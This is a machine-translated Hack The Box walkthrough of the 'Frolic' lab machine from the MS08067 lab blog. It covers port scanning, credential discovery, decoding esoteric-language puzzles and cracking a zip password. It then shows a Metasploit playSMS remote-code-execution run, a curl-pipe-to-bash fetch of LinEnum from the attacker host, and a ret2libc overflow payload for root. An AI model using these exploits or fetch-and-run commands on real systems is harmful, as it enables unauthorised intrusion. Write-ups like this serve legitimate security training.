Produce |MS08067 laboratory (www.ms08067.com)
The author of this article : Da Fangzi (Ms08067 Core members of the laboratory )
Hack The Box It's a CTF Challenge the target platform , Online penetration testing platform . It can help you improve your penetration testing skills and black box testing skills , It contains some constantly updated challenges , One of them is simulating real world scenes , There is also a tendency to CTF The challenge of style .
https://www.hackthebox.eu/
There are a lot of targets on the platform , From easy to difficult , Every time a hacker invades a machine, he will get corresponding points , There is a hall of fame by ranking points . What we're going to test today is the target Frolic.
First of all, we use nmap Scanning target's open ports and services :
nmap -sV -sT -sC 10.10.10.111
give the result as follows
1. Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-31 14:49 CST
2. Nmap scan report for 10.10.10.111
3. Host is up (0.33s latency).
4. Not shown: 996 closed ports
5. PORT STATE SERVICE VERSION
6. 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
7. | ssh-hostkey:
8. | 2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA)
9. | 256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA)
10.|_ 256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519)
11.139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
12.445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
13.9999/tcp open http nginx 1.10.3 (Ubuntu)
14.|_http-server-header: nginx/1.10.3 (Ubuntu)
15.|_http-title: Welcome to nginx!
16.Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel
17.
18.Host script results:
19.|_clock-skew: mean: -1h50m00s, deviation: 3h10m30s, median: -1s
20.|_nbstat: NetBIOS name: FROLIC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
21.| smb-os-discovery:
22.| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
23.| Computer name: frolic
24.| NetBIOS computer name: FROLIC\x00
25.| Domain name: \x00
26.| FQDN: frolic
27.|_ System time: 2019-03-31T12:20:18+05:30
28.| smb-security-mode:
29.| account_used: guest
30.| authentication_level: user
31.| challenge_response: supported
32.|_ message_signing: disabled (dangerous, but default)
33.| smb2-security-mode:
34.| 2.02:
35.|_ Message signing enabled but not required
36.| smb2-time:
37.| date: 2019-03-31 14:50:18
38.|_ start_date: N/A
39.
40.Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
41.Nmap done: 1 IP address (1 host up) scanned in 63.62 seconds
You can see 22 On port number SSH,139 and 445 Of SMB, and 9999 On port http.
Let's check SMB Is there any point that can be used , Here we use smbmap Look at the target's file sharing
1. smbmap -H 10.10.10.111
appear 2 We have a share, but we don't have access to it .
Let's go to the http look down
* Tips : have access to nc -zx IP port Can quickly detect the target address, whether the specified port is open .
Here we are nc -zx 10.10.10.111 1880 There will be
10.10.10.111: inverse host lookup failed: Unknown host
(UNKNOWN) [10.10.10.111] 1880 (?) open
there open explain 1880 The port is open
A welcome page , There's a line down there Thankyou for using nginx. http://forlic.htb:1880
Let's visit 10.10.10.111:1880
A backstage , We need an account and password , Try some common default account and password, login will appear prompt login failure , But when I use admin:password When , The page will be stuck all the time and will not jump out of any prompt , I don't know why , And here because of the security measures, failure many times will make us wait 10 Try again in a few minutes , So you can't use brute force to get the account password
We use it gobuster The contents of the website
1. gobuster -u http://10.10.10.111:9999 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o fronlic-gobuster.log -t 40
Gobuster Or part of it , Let's go straight to see what these are
We see backup There are 3 File (password.txt user.txt loop/)
Let's visit http://10.10.10.111:9999/backup/password.txt
The content appears :password - imnothuman
Let's visit http://10.10.10.111:9999/backup/user.txt
The content appears :user - admin
So we get a set of account passwords :admin: imnothuman
Go to the one just now Node-RED Try to log in
I can't find out , Let's go to the /admin try
The prompt appears You have left 2 attempt, I use burp There is no information in the bag , I looked at the source code Of JS Found this
One of the author's tricks , We type in... On the page admin: superduperlooperpassword_lol
I went in and found it was a mess
It should be a kind of coding , This also copied this pile of things into Google to find this website
https://www.dcode.fr/ook-language
Access to the / asdiSIAJJ0QWE9JAS
use vim write in frolic.bas64( There will be spaces in it. Remember to remove them , It can be used vim Command line input for s/ //g Go to )
use base64 decode
There's a mess , Because it's other file data , We export to a file and check the type
1. base64 -d frolic.bas64 > frolic
2. file frolic
Discovery is a ZIP file
use mv Rename it , And use zipinfu Check out the information
1. mv frolic frolic.zip
2. zipinfo frolic.zip
Decompression found that a password is needed
We use it zip2john Convert this compressed file into a password HASH, And then use john Go and crack it
1. zip2john frolic.zip > frolic.zip.hash
1. john --wordlist=/usr/share/wordlists/rockyou.txt frolic.zip.hash
2. john frolic.zip.hash --show
Password found :password
And then decompress it again
Cat The content feels like 16 Base number , Let's switch and try
1. cat index.php | xxd -r -ps
Output these contents to a file and use base64 Transcoding , Note that the output to the file has a newline. You need to remove the newline from the file
1. cat index.php | xxd -r -p > index.php.b64
This one also needs to be decrypted , I also use GOOGLE Find the corresponding cracked website
Website :https://www.dcode.fr/langage-brainfuck
Decryption result :idkwhatispass
There's no clue here , In all, we got 2 Set the password , That means there should be pages that we haven't found , The password should belong to the page we didn't find
Here we continue to input the order of blasting on the basis of the first blasting
1. for i in admin dev test backup loop;do gobuster -u http://10.10.10.111:9999/$i -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 150 -o Fronlic-gobuster-$i.log;done
This order is to make admin dev test backup loop and http://10.10.10.111:9999/ Make a combination and call gobuster Scan output , We need to wait for a while
We'll find it in /dev Next one /backup Catalog
Access to the
Then try to log in with the password we just got .
Correct account password :admin:idkwhatispass
Let's find out playsms Are there any known exploitable vulnerabilities
1. searchsploit playsms
We use it directly 1.4 Version of Remote code execution vulnerability
We can searchsploit-x Path Check the corresponding vulnerability description , Use by hand
You can also use msf Integrated in
1. msf5 exploit(multi/http/playsms_uploadcsv_exec) > set password idkwhatispass
2. password => idkwhatispass
3. msf5 exploit(multi/http/playsms_uploadcsv_exec) > set rport 9999
4. rport => 9999
5. msf5 exploit(multi/http/playsms_uploadcsv_exec) > set rhosts 10.10.10.111
6. rhosts => 10.10.10.111
7. msf5 exploit(multi/http/playsms_uploadcsv_exec) > set targeturi /playsms
8. targeturi => /playsms
9. msf5 exploit(multi/http/playsms_uploadcsv_exec) > set lhost 10.10.15.36
10.lhost => 10.10.15.36
11.msf5 exploit(multi/http/playsms_uploadcsv_exec) > run
A session will be returned after success
obtain user flag
The next step is to raise the right to obtain root jurisdiction
Here we use LinEnum It is used to check the utilization points that can be used to claim rights
Github:https://github.com/rebootuser/LinEnum
Use python Of SimpleHTTPServer The module of LineEnum Upload to target for execution
And then in shell In the implementation of
1. curl http://10.10.15.36:8000/LinEnum.sh | bash
And here we see with SUID One of my files is ayush Under the directory of
You can see that we have executable permissions for this file
Will take our input and output
We go through
1. base64 rop
Get the encoded content of this file , Then put it back to the machine and check and debug the decoding of this file
1. base64 -d rop.ba64 > rop
2. chmod +x rop
3. ./rop hello
Then we use it locally gdb debug
1. gdb rop
plug-in unit peda Installation :https://blog.csdn.net/gatieme/article/details/63254211
We make a 100 Input the length to rop
give the result as follows
Found that the program was terminated and prompted SIGSEGV
Because too much input leads to overflow
Let's record where the error happened on top 0x41474141
The transformation is AGAA
This is the position we just entered
use pattern_offset 0x1474141 Calculate the position , yes 52
And then we use python Output 52 individual A
At the same time, add your own information
Under transformation 0x7a666473
explain 52 Overflow occurs after a character .
Now we need to know /bin/sh The address of , I'm not going to do that by loading strings into environment variables as I used to do . There's a better way , First we need to find /bin/shin The offset libc, We're going to use it strings To get the address :
1. strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
Address :0x0015ba0b
And then we need the address libc, We can use ldd It comes to get it :
1. ldd rop
Address :0xb7e19000
Then we'll integrate the two addresses to get /bin/sh The real address of
/bin/sh:0x0015ba0b+ 0xb7e19000=0xb7f74a0b
Now what we need system() and exit() The address of
Here I need to run on target gdb see , But the target doesn't have gdb, We need to go from github And then download it to the target , Target aircraft can use wget Command to download , And then to gdb Add execute permission , Finally, rop debug
Github:https://github.com/hugsy/gdb-static/blob/master/gdb-7.10.1-x32
1. wget http://10.10.15.36:8000/gdb-7.10.1-x32
2. mv gdb-7.10.1-x32 gdb
3. chmod +x gdb
4. ./gdb /home/ayush/.binary/rop
adopt
(gdb)p system
(gdb)p exit
It's written in payload
1. #!/usr/bin/python
2.
3. import struct
4.
5. buf = "A" * 52
6. system = struct.pack("I" ,0xb7e53da0)
7. exit = struct.pack("I" ,0xb7e479d0)
8. shell = struct.pack("I" ,0xb7f74a0b)
9. print buf + system + exit + shell
And then put exp Upload it to the target to get root jurisdiction
For reprint, please contact the author and indicate the source !
Ms08067 Security lab focuses on the popularization and training of network security knowledge . Team published 《Web Safe attack and defense : Penetration test practice guide 》,《 Intranet security attack and defense : Penetration test practice guide 》,《Python Safe attack and defense : Penetration test practice guide 》,《Java Code security audit ( Introduction )》 Other books .
Team official account is regularly shared. CTF shooting range 、 Intranet penetration 、APT Technical dry goods , Starting from scratch 、 Based on actual combat , Dedicated to making a practical dry cargo sharing official account. .
Official website :https://www.ms08067.com/
Scan the QR code below and add it to the lab VIP Community
After joining, invite to join the internal VIP Group , The internal wechat group is permanent !
